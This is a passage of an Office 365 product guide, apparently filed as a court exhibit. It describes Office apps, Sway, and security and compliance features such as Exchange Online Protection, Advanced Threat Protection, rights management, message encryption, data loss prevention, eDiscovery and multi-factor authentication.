Touch Bar commands in PowerPoint allow you to easily manipulate graphic elements. The Reorder Objects button produces a graphical map of all the layers on a slide, making it easy to find the right object and move it where you want it. And by sliding your finger across the Touch Bar you can easily rotate an object to get just the right angle.

**Excel**

Typing an equals sign into a cell in Excel immediately pulls up the most recently used functions in the Touch Bar. For example, with a tap (for the formula) and another tap (for a named range) in the Touch Bar, you can quickly sum a range in your spreadsheet. The Touch Bar also provides quick access to borders, cell colors and recommended charts—making it easier than ever to organize and visualize your data.

**Outlook**

The Touch Bar in Outlook provides quick access to the most commonly used commands as you work on email and manage your calendar. When composing a new mail, the Touch Bar displays a list of recent documents. One tap and you can add a file—either as an attachment or a link. And from the Today view on the Touch Bar you can not only see your calendar events for the day, but even join a Skype for Business meeting.

Read more at: Office for Mac adds Touch Bar support.

## Resources

- Watch: Office 2016 for Mac: Top 10 reasons to get the new version
- Download and install Office 2016 for Mac using Office 365 for business
- Outlook 2016 for Mac training
- Word 2016 for Mac training
- Excel 2016 for Mac training
- PowerPoint 2016 for Mac training
- OneNote 2016 for Mac training

# Office on iOS, Android, Windows

Office for mobile device provides the same look and feel as Office on your desktop. Office also provides the same ability to store and share data on the cloud through Microsoft OneDrive for Business, allowing you to create, share, and edit data quickly and easily, even when you are on the go.

## Setup Mobile Device

Office 365 Windows Phone setup

- Set up email on Windows Phone
- Set up Office on Windows Phone with Office 365

Office 365 iPhone or iPad setup

- Set up email on iPhone, iPad, or iPod Touch
- Install and set up Office on an iPhone or iPad with Office 365

Office 365 Android phone or tablet setup

- Set up email on an Android phone or tablet
- Install and set up Office on an Android with Office 365

After you have installed the Office apps, you can sign in the Microsoft account that is connected to your Office 365 subscription to use the premium features of each app.

## Resources

- How Office mobile apps work on Android or iOS devices with an Office 365 plan
- Office for iPad videos
- Office for iPhone videos
- Getting started with Word for Android tablet
- Getting started with Excel for Android tablet
- Getting started with PowerPoint for Android tablet

## Sway

Sway is an intelligent digital storytelling app for business that helps you and your colleagues express ideas using an interactive, web-based canvas. Sway's built-in design engine helps you produce professional, visually-appealing reports, presentations, and more without the need for extensive formatting or additional training.

You can also modify the results to get the unique look and feel you want. Sway makes your creation look great in any browser on any screen, and it can be shared with colleagues and customers by simply sending a link. Sway helps you find and pull together all sorts of content without leaving the app, so you can drag and drop your images, text, videos, and charts right on to your canvas.

## Resources

Microsoft Sway Tutorials

- The Sway Way
- How to Build a Presentation in Sway
- How to Build a Presentation in Sway - Part 2
- How to Collaborate on a Sway
- How to Create a Newsletter in Sway
- How to Make a Tutorial in Sway

- How to Share a Sway

## Exchange Online Protection (EOP)

Microsoft Exchange Online Protection (EOP) is a cloud-based email filtering service that helps protect your organization against spam and malware, and includes features to safeguard your organization from messaging-policy violations. EOP can simplify the management of your messaging environment and alleviate many of the burdens that come with maintaining on-premises hardware and software.

The following are the primary ways you can use EOP for messaging protection:

- **In a standalone scenario.** EOP provides cloud-based email protection for your on-premises Exchange Server 2013 environment, legacy Exchange Server versions, or for any other on-premises SMTP email solution.
- **As a part of Microsoft Exchange Online.** By default, EOP protects Exchange Online cloud-hosted mailboxes.
- **In a hybrid deployment.** EOP can be configured to protect your messaging environment and control mail routing when you have a mix of on-premises and cloud mailboxes.

## Features

**Anti-malware protection**

- Using multiple anti-malware engines, EOP offers multilayered protection that's designed to catch all known malware
- Messages transported through the service are scanned for malware (viruses and spyware)
- If malware is detected, the message is deleted. Notifications may also be sent to senders or administrators when an infected message is deleted and not delivered.
- Customize anti-malware policies in the EAC. You can configure the default policy for company-wide settings.
- Create custom content filter policies and apply them to specified users, groups, or domains in your organization

**Anti-spam protection**

- Uses proprietary anti-spam technology to help achieve high accuracy rates.
- Provides strong connection filtering and content filtering on all inbound messages.
- Outbound spam filtering is also always enabled if you use the service for sending outbound email.
- Spam filtering cannot be completely disabled, but certain company-wide settings can be modified by editing your default anti-spam policies
- Create custom content filter policies and apply them to specified users, groups, or domains in your organization.

**Quarantine**

- Messages identified as spam and messages that match a transport rule can be sent to the administrator quarantine.
- Administrators can search for and view details about quarantined email messages in the EAC.
- After locating the email message, you can release it to specific users and optionally report it as a false positive (not junk) message to the Microsoft Spam Analysis Team if it was misidentified as spam.
- Spam quarantine for end users lets them manage their own spam-quarantined messages.

**Junk Email Reporting**

- From Office Outlook or Outlook Web Access, lets EOP users easily report junk (spam) email to Microsoft for analysis to help reduce the number and impact of future junk email messages filtered by the service.

## Resources

**Microsoft Virtual Academy Courses** …

- Office 365 Security & Compliance: Exchange Online Protection

**Read** …

- Exchange Online Protection
- Exchange Online Protection Service Description
- Exchange Online Protection Limits
- Anti-Malware Protection and Anti-Malware Protection FAQ
- Anti-Spam Protection and Anti-Spam Protection FAQ
- Prevent false positive email marked as spam with a safelist or other techniques
- What's the Difference Between Junk Email and Bulk Email?
- Customize an SPF record to validate outbound email sent from your domain
- Backscatter Messages and EOP

## Advanced Threat Protection (ATP)

Advanced threat protection (ATP) in Exchange Online Protection (EOP) helps you **prevent zero-day malware attacks** in your email environment.

ATP provides a way for you to create policies in the Exchange Admin Center (EAC) that help ensure your users access only links in emails or attachments to emails that are identified as not malicious.

If you already use EOP to help combat malware in your email messaging environment, adding ATP will provide more-effective protection than ever before against attacks propagated by unsafe links and unsafe attachments.



ATP complements existing EOP anti-malware scanning. Only those attachments that successfully pass anti-malware scanning are affected by your safe attachments or safe links policies.

## Features & Benefits

ATP for Exchange Online delivers the following benefits:

- **Protection against unknown malware and viruses**—Today EOP employs a robust and layered anti-virus protection powered with three different engines against known malware and viruses. ATP extends this protection through a feature called Safe Attachments, which protects against unknown malware and viruses, and provides better zero-day protection to safeguard your messaging system. All messages and attachments that don't have a known virus/malware signature are routed to a special hypervisor environment, where a behavior analysis is performed using a variety of machine learning and analysis techniques to detect malicious intent. If no suspicious activity is detected, the message is released for delivery to the mailbox.
- **Real time, time-of-click protection against malicious URLs**—EOP scans each message in transit in Office 365 and provides time of delivery protection, blocking any malicious hyperlinks in a message. But attackers sometimes try to hide malicious URLs with seemingly safe links that are redirected to unsafe sites by a forwarding service after the message has been received. ATP's Safe Links feature proactively protects your users if they click such a link. That protection remains every time they click the link, as malicious links are dynamically blocked while good links can be accessed.
- **Rich reporting and URL trace capabilities**—ATP also offers rich reporting and tracking capabilities, so you can gain critical insights into who is getting targeted in your organization and the category of attacks you are facing. Reporting and message tracing allows you to investigate messages that have been blocked due to an unknown virus or malware, while the URL trace capability allows you to track individual malicious links in the messages that have been clicked.

## Upcoming Improvements

- **New reports**—Get better insights to malware activity. Security admins will have a new reporting dashboard to see details of malware that Office 365 Advanced Threat Protection is analyzing. The new reports will be in *preview later this year*.
- **Dynamic delivery**—Better performance and lower latency for emails with attachments. Users will see a placeholder while attachments are scanned in a sandbox environment. If deemed safe, attachments are re-inserted into the email. Dynamic Delivery is rolling out to customers now.
- **URL detonation**—Deeper protection against malicious URLs. Not only do we check a list of malicious URLs when a user clicks on a link, but Office 365 will also perform real-time behavioral malware analysis in a sandbox environment to identify malicious links. URL reputation checks are part of Advanced Threat Protection today; URL detonation will be in *preview later this year*.
- **Intelligence sharing with** Windows Defender Advanced Threat Protection—Security admins will be able to see malware activity and relationships across Windows 10 and Office 365. Integration with Windows will be in *preview in early 2017*.
- **Broader protection**—Advanced Threat Protection will extend to include protection for SharePoint Online, Word, Excel, PowerPoint and OneDrive for Business. These extended capabilities will be in *preview in early 2017*.



## Scenarios

Advanced protection against unknown & sophisticated threats in end-user email, attachments & URLs.

- protect against unknown malware and viruses
- real time, time-of-click protection against malicious URLs
- rich reporting and URL trace capabilities

## Resources

- Microsoft Mechanics: Overview of Advanced Threat Protection in Exchange: new tools to stop unknown attacks
- Advanced threat protection for safe attachments and safe links
- Set up a safe attachments policy in EOP
- Set up a safe links policy in EOP

## RMS for Office 365 (RMS)

Rights Management Services enables you to restrict access to documents and email to specific people and to prevent anyone else from viewing or editing them, even if they are sent outside the organization.

- **Exchange Online IRM Integration**. Enables users of Exchange Online to IRM protect and consume e-mail messages (and attachments).
- **SharePoint Online IRM Integration**. Enables SharePoint Online administrators to create IRM-protected document libraries so that when a user checks-out a document from the IRM-protected document library, protection is applied to the document no matter where it goes and the user has the usage rights to that document as they were specified for the document library.
- **Office IRM Integration**. Enables Microsoft Office users to be able to IRM protect content using predefined policies provided by the service within an organization. Office applications that include these capabilities are Word, Excel, PowerPoint and, Outlook. In addition to this, Visio support is also available.

## Features

- **Help protect emails against unauthorized access** by applying different IRM options to your email messages.
- **Enhance security of your SharePoint libraries** by using IRM to set up appropriate permissions.
- **Help keep your information safe, online or offline,** because your files are protected whether they're viewed using Office Online or downloaded to a local machine.
- **Seamless integration with all Office documents** helps guard your organization's intellectual property.
- **Apply custom templates** based on your business needs in addition to using default Rights Management Services templates.

Examples of policies you can apply to email and documents with Rights Management for Office 365 are:

- **Do not forward (email)/ Restricted Access (Office apps)**: Only the recipients of the email or document will be able to view and reply. They cannot forward or share with other people or print.
- **CompanyName Confidential**: Only people inside your organization (that is, people with an Office 365 account @companyname.com) can access the content, make edits, and share with others inside your company
- **CompanyName Confidential View Only**: People inside your organization can view this content but cannot edit or change it in any way. They can print and share with other people inside your company.

## Levels of Protection

**Native**

- For text, image, Microsoft Office (Word, Excel, PowerPoint) files, Visio files, .pdf files, and other application file types that support RMS, native protection provides a strong level of protection that includes both encryption and enforcement of rights (permissions).

**Generic**

- For all other applications and file types, generic protection provides a level of protection that includes both file encapsulation using the .pfile file type and authentication to verify if a user is authorized to open the file.

## Azure Rights Management Connector

The Microsoft Rights Management (RMS) connector lets you quickly enable existing on-premises servers to use their Information Rights Management (IRM) functionality with the cloud-based Microsoft Rights Management service (Azure RMS).



With this functionality,

- All users can easily protect documents and pictures both inside your organization and outside, without having to install additional infrastructure or establish trust relationships with other organizations.
- You can use this connector even if some of your users are connecting to online services, in a hybrid scenario. For example, some users' mailboxes use Exchange Online and some users' mailboxes use Exchange Server.

The RMS connector supports the following on-premises servers: Exchange 2010/2013 Server, SharePoint 2010/2013 Server, and file servers that run Windows Server and use File Classification Infrastructure (FCI) to classify and apply policies to Office documents in a folder.

## Microsoft Rights Management sharing application

The Microsoft Rights Management sharing application is an optional downloadable application for Microsoft Windows and other platforms that provides the following:

- Protection of a single file or bulk protection of multiple files as well as all files within a selected folder.
- Full support for protection of any type of file and a built-in viewer for commonly used text and image file types.
- Generic protection for files that do not support RMS protection.
- Full interoperability with files protected using Office Information Rights Management (IRM).
- Full interoperability with PDF files protected using SharePoint, FCI, and supported PDF authoring tools.



## Scenarios

- Prevent loss of intellectual property and proprietary information.
- Limit e-mail and file access to only a specific list of individual users or groups identified by their e-mail addresses.
- Limit the use of e-mail and/or files to only a limited set of rights such as the right to view the document while blocking other actions such as copying or printing.

## Resources

- [Microsoft Azure Rights Management](#)
- [How Applications Support Azure Rights Management](#)
- [Activate Rights Management (RMS) in the Office 365 admin center](#)
- [Configure IRM (in Exchange Online) to use Azure Rights Management](#)
- [Set up Information Rights Management (IRM) in SharePoint admin center](#)
- [Configuring Super Users for Azure Rights Management and Discovery Services or Data Recovery](#)
- [Deploying the Azure Rights Management Connector](#)
- [Rights Management sharing application user guide](#)
- [Migrating from AD RMS to Azure Rights Management](#)

Case 0:20-cv-60416-XMC   Document 1-14 Entered on FLSB Docket 02/26/2020   Page 76 of 115

# O365 Message Encryption (OME)

Office 365 Message Encryption is an easy-to-use service that lets email users send encrypted messages to people inside or outside their organization.

Designated recipients can easily view their encrypted messages and return encrypted replies. Regardless of the destination email service—whether it's Outlook.com, Yahoo, Gmail, or another service—email users can send confidential business communications with an added level of protection against unauthorized access.

> *Office 365 Message Encryption is an online service that's built on Microsoft Azure Rights Management (Azure RMS).*

Exchange Online and Exchange Online Protection (EOP) administrators set up Office 365 Message Encryption by defining encryption rules.



## Features

Office 365 Message Encryption provides advanced security and reliability to help protect your information.

- **Send encrypted email messages to anyone**, regardless of the recipient's email address.
- **Provide strong, automated encryption** with a cost-effective infrastructure.
- **Eliminate the need for certificates** and use a recipient's email address as the public key.
- **Communication through a TLS-enabled network** further enhances message security.

- **Enhance the security of subsequent email responses** by encrypting each message in the thread

Office 365 Message Encryption helps keep your data safe, while allowing you to maintain control over your environment.

- **Easily set up encryption** using the single action Exchange transport rules.
- **Protect sensitive information** and data from leaving your gateway, consistently and automatically.
- **Policy-based encryption** encrypts messages at the gateway based on policy rules.
- **Help manage compliance** by leveraging the strong integration with data loss prevention.
- **Integrate with existing email infrastructure** for minimal up-front capital investment.
- **Grow your organization's brand** by using custom branding text or disclaimers and a custom logo

## Language support

Office 365 Message encryption supports Office 365 languages, as follows:

- Incoming email messages and attached HTML files are localized based on the sender's language settings.
- The viewing portal is localized based on the recipient's browser settings.
- The body (content) of the encrypted message isn't localized.

## Scenarios

There are many scenarios in which email message encryption might be required, including the following:

- A bank employee sending credit card statements to customers
- An insurance company representative providing policy details to customers
- A mortgage broker requesting financial information from a customer for a loan application
- A health care provider sending health care information to patients
- An attorney sending confidential information to a customer or another attorney
- A consultant sending a contract to a customer

## Resources

- Office 365 Message Encryption
- Encryption in Office 365
- Service information for Office 365 Message Encryption
- Send, view, and reply to encrypted messages
- Sign in to view your Office 365 encrypted message
- Use a one-time passcode to view an encrypted message
- Office 365 Message Encryption FAQ

# Office 365 Security & Compliance Center

The **Office 365 Security & Compliance Center** is your one-stop portal for protecting your data in Office 365.



## Navigation Pane

The new navigation pane on the left that gives you easy access to all the pages in the Security & Compliance Center.

| Menu Option | What it's for |
| --- | --- |
| Permissions | Grant permissions to people who perform compliance tasks like device management, data loss prevention, eDiscovery, and retention. |
| Security Policies | Manage devices and set up data loss prevention for your organization. |
| Data Management | Import email from other systems. Enable archive mailboxes or set policies for retaining email and other content within your organization. |
| Search & Investigation | Search for content and review user activity. Use eDiscovery to manage cases and Supervisory review to define policies that help you capture communication for review. |
| Reports | View user activity reports such as sign-ins for SharePoint Online, Exchange Online, and Azure Active Directory. |
| Service Assurance | View details about how Microsoft keeps Office 365 customer data safe, and how Office 365 helps customers meet industry compliance requirements. |

## Security Policies

Use security policies to help control and manage mobile device access to your organization's data, help protect your organization from data loss, and help protect inbound and outbound messages from malicious software and spam. You also use these policies to protect your domain's reputation and to determine whether or not senders are maliciously spoofing accounts from your domain.

| Tool | Description |
| --- | --- |
| Device management | Opens the Mobile Device Management (MDM) for Office 365 page where you can set up MDM for Office 365 to help you secure and manage your users' iPhones, iPads, Androids, and Windows phones. |
| Device security policies | Helps you protect your organization's information in Office 365 from unauthorized access. |
| Data loss prevention | Lets you create policies that help you identify, monitor, and automatically protect sensitive information across Office 365 |
| Anti-spam | Fine-tune and monitor settings that help prevent spam in Office 365. Create allow and block lists, determine who is spoofing your domain and why, and configure and view spam filter policies |
| Anti-malware | Protects against viruses and spyware traveling to or from your organization in Office 365. |
| Outbound spam | Checks to ensure that your users aren't sending spam. This can happen, for example, if a user's computer gets infected by malware that is programmed to send email messages |
| DKIM | DomainKeys Identified Mail (DKIM) helps ensure that other email systems trust messages that you send from Office 365. DKIM does this by adding a unique digital signature to email messages that you send from your organization. |
| Safe attachments | Safe attachments is part of Advanced Threat Protection (ATP). When enabled, email attachments are opened in a special, isolated environment that is separate from Office 365 before they are sent to recipient inboxes. Safe attachments is designed to help detect malicious attachments even before anti-virus signatures are available. |
| Safe links | Safe links is part of Advanced Threat Protection (ATP). Safe links helps prevent users from following links in email that link to web sites recognized as malicious. |

## Data management

Use the data management features to archive and preserve content in Exchange Online mailboxes, SharePoint Online sites, and OneDrive for Business locations, and import data into your Office 365 organization.

### Import

Use the **Import** feature to import PST files to Exchange mailboxes or import data files to SharePoint sites in your organization. For both types of files, you can upload the files over the network or copy them to a hard drive and then ship the drive to a Microsoft datacenter, where your data will be imported to Office 365.

## Archive

Use the **Archiving** feature to enable or disable a user's archive mailbox, which provide users with an alternate storage location for historical messaging data. When archive mailboxes are enabled, an archive policy will automatically move messages from a user's primary mailbox to their archive mailbox after a specified period (default setting: two years after the date a message is delivered). And users can still access these messages in their archive mailbox.

## Retention

Use the **Retention** feature to manage the lifecycle of email and documents by keeping the content you need and removing content after it's no longer required. While your organization may be required to retain content for a period of time because of compliance, legal, or other business requirements, keeping content longer than required might create unnecessary legal risk. These retention features let you manage how long your organization retains content.

- **Retention tags and policies**: Use to manage the email lifecycle by archiving or deleting messages that are older than a specified period
- **Document deletion policies**: Use to delete documents located in SharePoint site collections after a specific period of time. You can enforce a single mandatory policy on all site collections created from the same site collection template or you can allow site owners to choose from several policies that you centrally create and manage. You can also allow site owners to opt out altogether if they decide a policy doesn't apply to their content.
- **Preservation policies**: Use to preserve content in mailboxes, public folders, and sites in your organization. You can set up preservation policies to preserve the content indefinitely, until you remove the policy, or for a specific period of time. You can also specify a date range and keywords to narrow the content that's preserved. Preserved content remains in-place, where it's currently located, so people can continue to work with it. If content is modified or deleted, a copy is saved to a secure location

## Search & investigation

Use the search and investigation features to quickly find content in mailboxes and documents or search audit logs for various types of user and admin activity. You can find all content and user activity—whether it's in Exchange Online, SharePoint Online, or OneDrive for Business—providing you with unified protection for your Office 365 organization.

## Content search

Use the **content search** feature to search all mailboxes and public folders in Exchange Online, all SharePoint Online sites, and all OneDrive for Business locations in a single search. There are no limits on the number of mailboxes and sites that you can search. There are also no limits on the number of searches that can run at the same time.

After you run a search, the number of content sources and an estimated number of search results are displayed in the details pane on the search page, where you can preview the results, or export them to a local computer. You can also analyze the results of a content search using the powerful analytics features of **Advanced eDiscovery**.

## Audit log search

You can use the **audit log search** feature to view user and admin activity in your Office 365 organization. You can search for audit log entries for the following types of actions:

- User activity in SharePoint Online and OneDrive for Business
- User activity in Exchange Online (Exchange mailbox audit logging)
- Admin activity in SharePoint Online
- Admin activity in Azure Active Directory (the directory service for Office 365)
- Admin activity in Exchange Online (Exchange admin audit logging)
- User and admin activity in Sway
- User and admin activity in Power BI for Office 365
- User and admin activity in Yammer

**Important points**

- Mailbox audit logging must be turned on for each user mailbox before user activity in Exchange Online will be logged.
- You (or another admin) must first turn on audit logging before you can start searching the Office 365 audit log. To turn it on, just click **Start recording user and admin activity** on the **Audit log search** page in the Security & Compliance Center.
- You have to be assigned the View-Only Audit Logs or Audit Logs role in Exchange Online to search the Office 365 audit log. By default, these roles are assigned to the Compliance Management and Organization Management role groups on the **Permissions** page in the Exchange admin center.
- You can search the Office 365 audit log for activities that were performed within the last 90 days.
- It takes up to 15 minutes after an event occurs in SharePoint Online or OneDrive for Business for the corresponding audit log entry to be displayed. It takes up to 12 hours for events in Exchange Online and Azure Active Directory.

**Run an Audit log search**



Configure the following search criteria:

A. **Activities**. Click the drop-down list to display the activities that you can search for. User and admin activities are organized in to groups of related activities.
B. **Start date and End date**. The last seven days are selected by default. Select a date and time range to display the events that occurred within that period.
C. **Users**. Click in this box and then select one or more users to display search results for.
D. **File, folder, or site**. Type some of all of a file or folder name to search for activity on the file of folder that contains the specified keyword.

Click **Search** to run the search using your search criteria.

Refer to Search the audit log in the Office 365 Security & Compliance Center article for more information.

## eDiscovery

You can use the **eDiscovery** feature to access and manage eDiscovery cases in the eDiscovery Center of your SharePoint Online organization. It provides a quick and easy way to go to the eDiscovery Center, manage existing eDiscovery cases, create new eDiscovery cases, and close eDiscovery cases that are no longer needed.

You can also use this page to access **Advanced eDiscovery**, which provides advanced eDiscovery capabilities that help you analyze large, unstructured data sets and reduce the amount of data that's most relevant to a legal case.

## Advanced eDiscovery

Office 365 **Advanced eDiscovery** builds on the existing set of eDiscovery capabilities in Office 365. For example, you can use the **Content Search** feature to perform an initial search of all the content sources in your organization to identify and collect the data that may be relevant to a specific legal case. Then you can perform analysis on that data by applying the text analytics, machine learning, and the Relevance/predictive coding capabilities of Advanced eDiscovery.

This can help your organization quickly process thousands of email messages, documents, and other kinds of data to find those items that are most likely relevant to a specific case. The reduced data set can then be exported out of Office 365 for further review.

## Supervisory Review

Define a supervisory review policy to indicate who in your organization will have their email communications reviewed and who will perform those reviews.

Follow the steps to implement Supervisory review:

- Set up groups for Supervisory review. Before you start using Supervisory review, determine who will have their communication reviewed, and who will perform those reviews. If you want to get started with just a few individuals to see how Supervisory review works, you can skip setting up groups for now.
- Make Supervisory review available in your organization. Add the supervisory review role for yourself so you can set up policies. Anyone who has this role assigned can find Supervisory review in the Office 365 Security & Compliance Center menu.
- Set up a supervisory review policy in the Security & Compliance Center. These policies define which communications are subject to review in your organization, and specifies who should perform reviews.
- Install the supervisory review Outlook app for reviewers. This gives reviewers access the Supervisory Review folder in Outlook so they can assess and categorize each item.

**Supervisory review report** - Run the Supervisory review report to check the review process is working well for your organization.

## Quarantine

Set up a quarantine for incoming email messages in Office 365 where messages that have been filtered as spam, bulk, or phishing mail can be kept for later review.

Both users and admins can work with quarantined messages. Users can work with just their own filtered messages in quarantine. Admins can search for and manage quarantined messages for all users.

Learn more about working with quarantined messages:

- Find and release quarantined messages as an administrator
- Use user spam notifications to release and report spam-quarantined messages
- Quarantine FAQ

## Service Assurance

Use Service assurance to access documents that describe a variety of topics, such as Microsoft's security practices for customer data that is stored in Office 365 and independent

third-party audit reports on Office 365. You can also find out how Office 365 can help customers be compliant with standards, laws, and regulations across industries.

## Service Compliance Reports

These reports are created by independent 3rd-party auditors who assess how Office 365 complies with the regulatory and security standards that apply to specific industries and regions. Review the reports to stay up to date on how Office 365 is committed to helping you stay compliant with the standards that matter to your organization.

## Trust documents

Review white papers, FAQs, end-of-year reports, and other trust-related documents provided by Microsoft.

## Resources

- Overview of the Office 365 Security & Compliance Center
- Permissions in the Office 365 Security & Compliance Center
- Security policies in the Office 365 Security & Compliance Center
- Data management in the Office 365 Security & Compliance Center
- Search and investigation in the Office 365 Security & Compliance Center
- Reports in the Office 365 Security & Compliance Center
- Service assurance in the Office 365 Security & Compliance Center
- Audited activities in Office 365
- Office 365 Management Activity API reference
- Office 365 Management Activity API schema
- MSIT Showcase: Changing our approach to information security at Microsoft

## Data Loss Prevention (DLP)

To **comply with business standards and industry regulations**, organizations need to protect sensitive information and prevent its inadvertent disclosure. Examples of sensitive information that you might want to prevent from leaking outside your organization include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or health records.

With a data loss prevention (DLP) policy in the O365 Security & Compliance Center, you can identify, monitor, and automatically protect sensitive information across Office 365.

## For Exchange Online

You can configure DLP policies which allows you to:

- Start with a pre-configured policy template that can help you detect specific types of sensitive. DLP includes 80

sensitive information types that are ready for you to use in your DLP policies
- Use the full power of existing transport rule criteria and actions and add new transport rules.
- Test the effectiveness of your DLP policies before fully enforcing them.
- Incorporate your own custom DLP policy templates and sensitive information types.
- Detect sensitive information in message attachments, body text, or subject lines and adjust the confidence level at which the service takes action.
- Detect sensitive form data by using Document Fingerprinting which helps you easily create custom sensitive information types based on text-based forms.
- Add Policy Tips, which can help reduce data loss by displaying a notice to your Outlook 2013, Outlook Web App, and OWA for Devices users and can also improve the effectiveness of your policies by allowing false-positive reporting.
- Review incident data in DLP reports or add your own specific reports by using a generate incident report action

## For SharePoint Online and OneDrive for Business

By extending DLP to OneDrive for Business and SharePoint Online, we expanded on the same protection you already have in Exchange, Outlook and Outlook on the web, offering broader protection of your data wherever it lives.

With a DLP policy, you can:

- Identify sensitive information across many locations, such as SharePoint Online and OneDrive for Business. For example, you can identify any document containing a credit card number that's stored in any OneDrive for Business site, or you can monitor just the OneDrive sites of specific people.
- Prevent the accidental sharing of sensitive information. Across all sites, you can identify any document containing a health record that's shared with people outside your organization, and then automatically block access to that document for everyone except the site owner, document owner, and the person who last modified the content.
- Monitor and protect sensitive information in Office 2016. Excel 2016, PowerPoint 2016, and Word 2016 include capabilities to identify sensitive information and apply DLP policies. DLP provides continuous monitoring when people share content in these Office 2016 programs.
- Help users learn how to stay compliant without interrupting their workflow. Send them an email notification and show them a policy tip in the context of the document library. Allow them to override the policy if they have a business justification. The same policy tips also appear in Excel 2016, PowerPoint 2016, and Word 2016.
- View DLP reports showing content that matches your organization's DLP policies.

## Resources

**Watch Videos** ...

- Updates to Data Loss Prevention in Office 365

**Read** ...

- Data loss prevention in Exchange Online
- How DLP rules are applied to evaluate messages
- Document Fingerprinting
- Overview of data loss prevention policies
- Create a DLP policy from a template
- Sensitive information types inventory

> **Microsoft IT** recently released a case study on how it leverages the data loss prevention solution in Office 365 to help reduce the risk of sharing sensitive data while still promoting collaboration.
>
> Read: How Microsoft monitors and protects sensitive data in Office 365

## eDiscovery and Content Search

Electronic discovery, or eDiscovery, is the process of identifying and delivering electronic information that can be used as evidence in legal cases. You can use eDiscovery in Office 365 to search that spans Exchange email, SharePoint and OneDrive for Business documents, and Skype conversations.

If you only need to search mailboxes, you can use In-Place eDiscovery in the Exchange admin center (EAC). If you need to search mailboxes and SharePoint sites in the same eDiscovery search, you can use the eDiscovery Center in SharePoint Online. In both cases, you can identify, hold, and export content found in Exchange mailboxes and SharePoint sites

The **Office 365 Security & Compliance Center** is quick and easy way to ...

- go to the eDiscovery Center,
- manage existing eDiscovery cases,
- create new eDiscovery cases, and
- close eDiscovery cases that are no longer needed.

## Content Search

You can use **Content Search** in the **Office 365 Security & Compliance Center** to search **all** the mailboxes, SharePoint Online sites, and OneDrive for Business locations in your Office 365 organization.

- Compliance Search is a new eDiscovery search tool with new and improved scaling and performance capabilities.
- Run very large eDiscovery searches.
- Search all mailboxes, all SharePoint Online sites, and OneDrive for Business locations in a single compliance search.

- No limits on the number of mailboxes and sites that you can search.
- No limits on the number of searches that can run at the same time.
- Number of content sources and an estimated number of search results are displayed in the details pane on the Compliance search page, where you can preview the results

## Place sources on hold

When a content source is part of a case, you can place it on hold so that a copy is preserved. This includes SharePoint sites, documents, or pages, and Exchange mailboxes.

These types of content can be placed on hold as part of a case:

- SharePoint Objects, such as, Documents, Lists (including blogs and wiki content), Pages (including pages that host blogs and wikis)
- Exchange objects, such as tasks, calendar entries, contacts, email messages and attachments. If Microsoft Skype conversations are archived in Microsoft Exchange, they will be included.

When you place a hold on the content sources in an eDiscovery set, the hold status for each source is displayed in the **In-Place Hold Status** column in the list of content sources.

## Scenarios

- **Reduce risk** of non-compliance due to time delays
- **Control increasing cost** of compliance processes: time, expenses, resources.
- **Effective management** of compliance processes.

## Resources

- eDiscovery in the Office 365 Security & Compliance Center
- Permissions in the Office 365 Security & Compliance Center
- Compliance Search in the Office 365 Security & Compliance Center
- Add content to an eDiscovery case and place sources on hold
- In-Place Hold and Litigation Hold (Exchange Online)
- MSIT Showcase: Office 365 meets evolving eDiscovery challenges in a cloud-first world

## Advanced eDiscovery

With Advanced eDiscovery, you can better understand your Office 365 data and reduce your eDiscovery costs. Advanced eDiscovery helps you analyze unstructured data within Office 365, perform more efficient document review, and make decisions to reduce data for Discovery. You can work with data stored in Exchange Online, SharePoint Online, OneDrive for Business, and Skype for Business. You can select groups,

individual mailboxes and sites, and then analyze it with Advanced eDiscovery.

Advanced eDiscovery streamlines and speeds up the document review process by identifying redundant information with features like Near-duplicates detection and Email Thread analysis. The Relevance feature applies predictive coding technology to identify relevant documents. Advanced eDiscovery learns from your tagging decisions on sample documents and applies statistical and self-learning techniques to calculate the relevance of each document in the data set. This enables you to focus on key documents, make quick yet informed decisions on case strategy, cull data, and prioritize review.

## Features

**More efficient document review**

- identifies redundant information with features like **Near-Duplicate Detection**, which provides information about how similar documents are to each other; and **Thread Analysis**, which identifies emails that contain other emails in a thread, allowing you to review just the unique emails rather than every single one.
- reduces document review costs significantly.
- when you export data, the near-duplicate and email thread metadata are available to be loaded into other eDiscovery tools.

**Reduce data for eDiscovery**

- offers a **Relevance** feature, which applies predictive coding technology to teach the system to identify relevant documents
- **learns** from your tagging decisions on sample documents, and the system **applies statistical and self-learning techniques** to calculate the relevance of each document in the data set.
- enables you to focus on key documents and make quick yet informed decisions on case strategy.
- by ranking documents by relevance, you can also precisely cull the data and prioritize review.

**Understand unstructured data**

- **Themes** and **Search** are powerful features for early case assessment and internal investigations that help you quickly map the collection and find key data points.
- Themes groups related documents, allowing you to identify topics of interest, drill down to discover more material, find similar documents, and intuitively explore your data set by following up on related themes.
- Search gives search capabilities such as wildcards, Boolean logic, conceptual search and term expansion.

## Setup and Use

Please refer to following articles to learn how to setup and use various modules and features:

- Quick setup for Advanced eDiscovery: Helps you to get started with Advanced eDiscovery.
- Running the Advanced eDiscovery Process module: Enables the preparation of files from specified data sources.
- Analyzing case data with Advanced eDiscovery: Allows identification and grouping of Near-duplicate files and hierarchically structured groups of Email Threads.
- Managing Advanced eDiscovery Relevance setup: Allows the definition of parameters for Relevance processing.
- Using the Advanced eDiscovery Relevance module: Identifies and ranks files by Relevance scores, which assists with early case assessment, document culling, and review.
- Exporting case data with Advanced eDiscovery: Enables the export of Advanced eDiscovery data and results for review.
- Running reports in Advanced eDiscovery: Enables the generation of .csv file output for the selected reports.
- Defining case and tenant settings in Advanced eDiscovery: Allows the definition of parameters at the case and tenant level.
- Using Advanced eDiscovery utilities: Enables the execution of defined Advanced eDiscovery utilities on case data.
- User roles and access in Advanced eDiscovery: Describes the access to features for each user role.

## Scenarios

> *Simplifies the eDiscovery process across your email and document repositories*

This **new machine learning & analytics** functionality improves existing eDiscovery by:

- Significantly **reducing** document review **costs**.
- **Speeding** up the document review **process**.
- Using core technology (Equivio) that has already achieved **broad acceptance** in the legal community.

## Resources

**Watch Videos** …

- Office 365 Advanced eDiscovery

**Read** …

- Office 365 Advanced eDiscovery
- Analyze Office 365 data with Equivio Zoom
- MSIT Showcase: Office 365 meets evolving eDiscovery challenges in a cloud-first world

# MFA for Office 365 (MFA)

MFA helps secure user sign-ins for cloud services beyond just a single password. The security of multi-factor authentication lies in its layered approach.

- Compromising multiple authentication factors presents a significant challenge for attackers.

- Even if an attacker manages to learn the user's password, it is useless without also having possession of the trusted device.
